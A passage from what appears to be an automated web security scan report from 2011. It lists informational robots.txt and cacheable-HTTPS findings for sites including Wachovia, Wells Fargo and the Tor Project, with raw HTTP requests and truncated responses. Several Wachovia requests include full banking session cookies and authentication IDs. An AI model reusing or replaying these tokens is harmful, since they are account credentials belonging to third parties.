Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1031455071/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Tue, 19 Jul 2011 01:59:56 GMT
Expires: Tue, 19 Jul 2011 01:59:56 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

19.31. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthcentral.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR CONi OUR DELi SAMi OTRi STP STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Accept-Ranges: bytes
Last-Modified: Tue, 01 Mar 2011 21:19:28 GMT
ETag: "1CBD85658DF3000:1CC45B7680520C0"
Content-Type: text/plain
Content-Length: 1057
Expires: Tue, 19 Jul 2011 01:58:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 01:58:55 GMT
Connection: close
Set-Cookie: THCN=r4172361686; path=/; expires=Fri, 1 Jan 2010 01:01:50 GMT

User-agent: *
Sitemap: http://www.healthcentral.com/hc_sitemap.xml
Sitemap: http://www.healthcentral.com/common/h/sitemaps/google_index.xml
Sitemap: http://www.healthcentral.com/profiles/c/sitemaps
...[SNIP]...

19.32. http://www.internode.on.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internode.on.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.internode.on.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 10:03:48 GMT
Server: Apache
Last-Modified: Thu, 09 Dec 2010 00:37:34 GMT
Accept-Ranges: bytes
Content-Length: 194
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /errors/
Disallow: /templates/
Disallow: /about/careers/
Disallow: /webtools/advisories/
Disallow: /contact/online/
Disallow: ~

User-agent: Googlebot-Image
Disallow: /


19.33. http://www.printfection.com/torprojectstore

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.printfection.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:20 GMT
Server: Apache
Last-Modified: Thu, 15 Nov 2007 05:15:59 GMT
ETag: "37b84cd-18-c70661c0"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

19.34. http://www.rockhall.co.uk/ContactStyles

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /ContactStyles

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rockhall.co.uk

Response

HTTP/1.1 200 OK
Content-Length: 381
Content-Type: text/plain
Last-Modified: Sun, 15 Nov 2009 18:31:23 GMT
Accept-Ranges: bytes
ETag: "e6b88cd52166ca1:2407e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 01:59:56 GMT
Connection: close

# Default modx exclusions
User-agent: *
Disallow: /assets/cache/
Disallow: /assets/docs/
Disallow: /assets/export/
Disallow: /assets/import/
Disallow: /assets/modules/
Disallow: /assets/plugins
...[SNIP]...

19.35. http://www.scout.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://www.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:16c7"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:04:46 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

19.36. https://www.torproject.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torproject.org
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.torproject.org

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:47 GMT
Server: Apache
Last-Modified: Mon, 18 Jul 2011 17:59:17 GMT
Accept-Ranges: bytes
Content-Length: 118
Cache-Control: max-age=43200
Expires: Tue, 19 Jul 2011 13:58:47 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15768000
Connection: close
Content-Type: text/plain
Content-Language: en

Sitemap: http://www.torproject.org/sitemap.xml
Sitemap: https://www.torproject.org/sitemap.xml
User-Agent: *
Allow: /

19.37. https://www.torservers.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.torservers.net

Response

HTTP/1.0 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "4021895836"
Last-Modified: Sat, 16 Apr 2011 21:17:11 GMT
Content-Length: 53
Connection: close
Date: Tue, 19 Jul 2011 01:58:32 GMT
Server: lighttpd

User-agent: *
Disallow: /images/
Disallow: /mirrors/

19.38. https://www.wachovia.com/enroll

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /enroll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wachovia.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:50:44 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 13 May 2011 16:50:12 GMT
Accept-Ranges: bytes
Content-Length: 15987
Cache-Control: max-age=-4554032
Expires: Fri, 27 May 2011 16:50:12 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Keep-Alive: timeout=10, max=77
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /foundation/v/index.jsp?vgnextoid=dda5496364704210VgnVCM100000617d6fa2RCRD&vgnextnoice=1
Disallow: /foundation/v/index.jsp?vgnextoid=bb69e72b79704210VgnVCM100000617d6fa2RCRD&
...[SNIP]...

19.39. http://www.wellsfargo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellsfargo.com

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:31 GMT
Content-length: 7033
Content-type: text/plain
Last-modified: Tue, 28 Jun 2011 01:56:46 GMT
Accept-ranges: bytes
Connection: close

# robots.txt for www.wellsfargo.com
# Last generated Tue May 1 09:06:35 2001
User-agent: *
Disallow: /ads/
Disallow: /akamai/
Disallow: /auxiliary_access/
Disallow: /bop/
Disallow: /browser/
Disallow
...[SNIP]...

19.40. https://www.wellsfargo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellsfargo.com

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:41:00 GMT
Content-length: 7033
Content-type: text/plain
Last-modified: Tue, 28 Jun 2011 01:56:46 GMT
Accept-ranges: bytes
Connection: close

# robots.txt for www.wellsfargo.com
# Last generated Tue May 1 09:06:35 2001
User-agent: *
Disallow: /ads/
Disallow: /akamai/
Disallow: /auxiliary_access/
Disallow: /bop/
Disallow: /browser/
Disallow
...[SNIP]...

19.41. https://www.wellsfargoadvisors.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellsfargoadvisors.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:09 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 01 Jun 2011 16:00:13 GMT
ETag: "a07-3c-9da2dd40"
Accept-Ranges: bytes
Content-Length: 60
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /dsip
Disallow: /outlook/index.htm

20. Cacheable HTTPS response
There are 39 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


20.1. https://onlineservices.wachovia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:51:51 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 26 Sep 2006 19:27:26 GMT
ETag: "ac0e4-1cee-4be78380"
Accept-Ranges: bytes
Content-Length: 7406
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

...[SNIP]...

20.2. https://onlineservices.wachovia.com/ols/css/interference.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /ols/css/interference.css

Request

GET /ols/css/interference.css HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
Referer: https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=http%3a//www.wachovia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:51:48 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 26 Sep 2006 19:27:26 GMT
ETag: "b417f-2f-4be78380"
Accept-Ranges: bytes
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css

/@import url("/ols/css/handheld.css") handheld;

20.3. https://www.torproject.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torproject.org
Path:   /

Request

GET / HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
Referer: https://www.torservers.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:45 GMT
Server: Apache
Content-Location: index.html.en
Vary: negotiate,accept-language,Accept-Encoding
TCN: choice
Last-Modified: Mon, 18 Jul 2011 17:59:16 GMT
Accept-Ranges: bytes
Cache-Control: max-age=43200
Expires: Tue, 19 Jul 2011 13:58:45 GMT
Strict-Transport-Security: max-age=15768000
Content-Length: 12553
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tor Project: Anonymity Online</title>
<link rel="shortcut icon" type="image/x-icon"
...[SNIP]...

20.4. https://www.torproject.org/css/master.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torproject.org
Path:   /css/master.css

Request

GET /css/master.css HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
Referer: https://www.torproject.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:48 GMT
Server: Apache
Last-Modified: Mon, 18 Jul 2011 17:59:18 GMT
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Tue, 26 Jul 2011 01:58:48 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15768000
Content-Length: 87
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css
Content-Language: en

@charset "UTF-8";
@import "reset.css";
@import "layout.css";
@import "typography.css";

20.5. https://www.torproject.org/docs/documentation.html.en

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torproject.org
Path:   /docs/documentation.html.en

Request

GET /docs/documentation.html.en HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:24 GMT
Server: Apache
Last-Modified: Mon, 18 Jul 2011 17:59:18 GMT
Accept-Ranges: bytes
Cache-Control: max-age=43200
Expires: Tue, 19 Jul 2011 13:59:24 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15768000
Content-Length: 19917
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tor: Documentation</title>
<link rel="shortcut icon" type="image/x-icon" href="../im
...[SNIP]...

20.6. https://www.torservers.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /

Request

GET / HTTP/1.1
Host: www.torservers.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-type: text/html
Date: Tue, 19 Jul 2011 01:58:30 GMT
Server: lighttpd
Content-Length: 6605

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

20.7. https://www.torservers.net/donate.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /donate.html

Request

GET /donate.html HTTP/1.1
Host: www.torservers.net
Connection: keep-alive
Referer: https://www.torservers.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-type: text/html
Date: Tue, 19 Jul 2011 01:59:32 GMT
Server: lighttpd
Content-Length: 24791

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

20.8. https://www.wachovia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /

Request

GET / HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:19 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 07 Jul 2011 23:00:15 GMT
Accept-Ranges: bytes
Cache-Control: max-age=220015
Expires: Thu, 21 Jul 2011 23:00:15 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Length: 26382
Keep-Alive: timeout=10, max=158
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wachovia - Person
...[SNIP]...

20.9. https://www.wachovia.com/enroll

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /enroll

Request

GET /enroll HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:50:44 GMT
Server: IBM_HTTP_Server
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 10558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

20.10. https://www.wachovia.com/files/pres/interference.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /files/pres/interference.css

Request

GET /files/pres/interference.css HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
Referer: https://www.wachovia.com/enroll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=920DCE66B1EC10B13488C08483F0D444; JSESSIONID=0000nkyzwrL8tsfz1ZrPhM0ci7Q:13jgrcho1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:50:45 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 17 Nov 2008 22:44:21 GMT
Accept-Ranges: bytes
Cache-Control: max-age=-82897584
Expires: Mon, 01 Dec 2008 22:44:21 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Length: 36
Keep-Alive: timeout=10, max=193
Connection: Keep-Alive
Content-Type: text/css

/@import url(handheld.css) handheld;

20.11. https://www.wachovia.com/foundation/v/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /foundation/v/index.jsp

Request

GET /foundation/v/index.jsp?vgnextoid=a47ea6e605ecd110VgnVCM200000627d6fa2RCRD HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000nkyzwrL8tsfz1ZrPhM0ci7Q:13jgrcho1; TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069073761-New%7C1342605073761%3B; s_sess=%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B; uidServiceSelection=gotoBanking

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:51:12 GMT
Server: IBM_HTTP_Server
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=140
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5273


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
...[SNIP]...

20.12. https://www.wachovia.com/miscpop1197

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /miscpop1197

Request

GET /miscpop1197 HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000nkyzwrL8tsfz1ZrPhM0ci7Q:13jgrcho1; TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; uidServiceSelection=gotoBanking; wcp_hawk_accepted=true; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:52:58 GMT
Server: IBM_HTTP_Server
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=126
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 4309


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
...[SNIP]...

20.13. https://www.wachovia.com/retirementlogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /retirementlogin

Request

GET /retirementlogin HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
